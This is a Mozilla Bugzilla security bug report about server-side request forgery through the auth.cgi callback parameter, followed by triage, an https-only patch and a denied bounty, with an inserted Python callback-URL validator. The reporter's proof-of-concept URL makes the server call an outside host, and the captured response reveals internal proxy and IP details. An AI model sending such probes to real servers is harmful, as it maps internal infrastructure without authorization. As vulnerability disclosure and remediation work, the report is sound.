Closed
Bug 1310747
Opened 8 years ago
Closed 8 years ago
SSRF
Categories
(bugzilla.mozilla.org :: General, defect)
RESOLVED
FIXED
People
(Reporter: p4r3sh.p4rm4r, Assigned: dylan)
Details
(Whiteboard: [reporter-external] [web-bounty-form] [verif?])
Attachments (2 files)
- 116.06 KB, image/png
- 615 bytes, patch (dkl: review+)
Reporter
Description
Hi,

Endpoint: callback=

Steps:
1. Go to the URL below:
   https://bugzilla.mozilla.org/auth.cgi?callback=http://testss.blinkie.xyz&description=foobar
2. After accepting the 'Auth Delegation Request' I am getting a response back to my host.

Response I got:

ip: 63.245.214.162
{
  "host": "testss.blinkie.xyz",
  "user-agent": "libwww-perl/5.835",
  "content-length": "104",
  "content-type": "application/json",
  "via": "1.1 proxy2.dmz.scl3.mozilla.com (squid/3.1.23)",
  "x-forwarded-for": "10.22.82.28",
  "cache-control": "max-age=259200",
  "connection": "keep-alive",
  "url": "/"
}
Flags: sec-bounty?
Comment 1•8 years ago
Dylan, I think this is expected behavior, but could you take a look at it please? Thanks!
Group: websites-security → bugzilla-security
Component: Other → General
Flags: needinfo?(dylan)
Product: Websites → bugzilla.mozilla.org
Version: unspecified → Production
Reporter
Comment 2•8 years ago
Even I thought that, but rather than proxying requests on behalf of users, the application should have the user's browser retrieve the desired information. If it is necessary to proxy the request, a whitelist should be used on the server side and the User-Agent information should be stripped or modified.
Comment 3•8 years ago
Wow. If this is intended behavior we need to put /some/ rules into which sites we allow. At the very least we shouldn't be allowing insecure http: links.
Assignee
Comment 4•8 years ago
(In reply to Paresh from comment #2)
> even i thought that, but Rather than proxying requests on behalf of users,
> application should have user's browser retrieve the desired information. If
> it is necessary to proxy the request, a whitelist should be used on the
> server side and the User-Agent information should be stripped or modified.

Using the browser is absolutely out due to the obvious ways of gaming that system.

(In reply to Daniel Veditz [:dveditz] from comment #3)
> Wow. If this is intended behavior we need to put /some/ rules into which
> sites we allow. At the very least we shouldn't be allowing insecure http:
> links.

The user does have to confirm via "Auth Delegation Request". I note this feature and its current design were both subject to an RRA.

I agree that we should limit it to https only.
Flags: needinfo?(dylan)
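The https-only rule agreed in comment 4, as an added example that is not part of this bug, its patch, or BMO's own code. It is written in Python rather than BMO's Perl, and it goes beyond the patch: besides rejecting any scheme other than https it refuses a callback with no host or with embedded credentials, and when the host is a literal IP it rejects loopback, private, link-local and other non-global addresses. The function names and error strings are hypothetical; the sample URLs in the comments reuse the reporter's callback host.

```python
"""Callback URL validator for an auth-delegation style endpoint.

Added example (editor's code, not BMO's). Implements the https-only rule
from comment 4 and adds the host, credential and literal-IP checks a
practitioner would want. Function names are hypothetical.
"""
import ipaddress
from typing import Optional
from urllib.parse import urlsplit

# Only https is accepted; the bug's proof of concept used a plain http callback.
ALLOWED_SCHEMES = {"https"}


def callback_url_error(url: str) -> Optional[str]:
    """Return None if the callback URL is acceptable, else a short reason.

    Checks, in order: parseable; https scheme; a non-empty host; no
    user:password@ component; and, if the host is a literal IP address,
    that it is globally routable (rejects 127.0.0.1, 10/8, ::1, etc.).
    """
    try:
        parts = urlsplit(url)
    except ValueError:
        # urlsplit raises on malformed IPv6 literals and similar
        return "unparseable URL"
    if parts.scheme not in ALLOWED_SCHEMES:
        # e.g. "http://testss.blinkie.xyz" from the bug description
        return f"scheme {parts.scheme!r} not allowed; only https"
    if not parts.hostname:
        return "missing host"
    if parts.username is not None or parts.password is not None:
        return "credentials in URL not allowed"
    try:
        addr = ipaddress.ip_address(parts.hostname)
    except ValueError:
        # A DNS name. Accepted here; what it resolves to must be checked
        # again at connect time (see the note below the block).
        return None
    if not addr.is_global:
        return f"literal address {addr} is not globally routable"
    return None


def is_acceptable_callback(url: str) -> bool:
    """Boolean wrapper around callback_url_error()."""
    return callback_url_error(url) is None


if __name__ == "__main__":
    # Constructed inputs: the reporter's http callback, its https form,
    # and the proxy's internal x-forwarded-for address from the description.
    for candidate in (
        "http://testss.blinkie.xyz",
        "https://testss.blinkie.xyz",
        "https://10.22.82.28/",
        "https://user:pw@example.com/",
    ):
        print(candidate, "->", callback_url_error(candidate) or "ok")
```

Two caveats. The literal-IP check only covers hosts written as addresses; a DNS name that resolves to an internal address passes this function, so the address the server actually connects to has to be checked again after resolution (and the check has to survive a hostname that resolves differently on a second lookup). And the scheme check is a restriction, not a whitelist: comment 2's suggestion of a server-side list of allowed callback hosts is a stricter policy than anything this function enforces.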
Assignee
Comment 5•8 years ago
This is the message you have to click through, which is pretty indicative of the action that will be performed.
Assignee: nobody → dylan
Assignee
Comment 6•8 years ago
Attachment #8801830 - Flags: review?(dkl)
Comment 7•8 years ago
Marking this as sec-bounty-, as this is working as intended. Nice job on the patch as always, dylan. :)
Group: bugzilla-security
Flags: sec-bounty? → sec-bounty-
Comment 8•8 years ago
Comment on attachment 8801830 [details] [diff] [review]
1310747_1.patch

Review of attachment 8801830 [details] [diff] [review]:
-----------------------------------------------------------------

r=dkl
Attachment #8801830 - Flags: review?(dkl) → review+
Reporter
Comment 9•8 years ago
As you notice in the response, you are using squid/3.1.23, which is an older version of the Squid proxy. Advisory for 3.1.23: http://www.squid-cache.org/Advisories/SQUID-2012_1.txt (DoS in cachemgr.cgi). Why don't you update it to the latest version? http://www.squid-cache.org/Versions/
Comment 10•8 years ago
Version numbers are notoriously unreliable, as vendors such as Redhat and Canonical backport security patches to older versions.
Assignee
Updated•8 years ago
Status: UNCONFIRMED → NEW
Ever confirmed: true
Assignee
Comment 11•8 years ago
To git@github.com:mozilla-bteam/bmo.git 2f310fb..3e67364 master -> master
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Reporter
Comment 12•8 years ago
Is the fix live or not?
Assignee
Comment 13•8 years ago
It'll get pushed out next week.
Reporter
Comment 14•8 years ago
In the meantime, can I go further into that endpoint for testing?
Assignee
Comment 15•8 years ago
It would be better to test bugzilla-dev.allizom.org.
Assignee
Comment 16•8 years ago
The documentation is here: http://bmo.readthedocs.io/en/latest/integrating/auth-delegation.html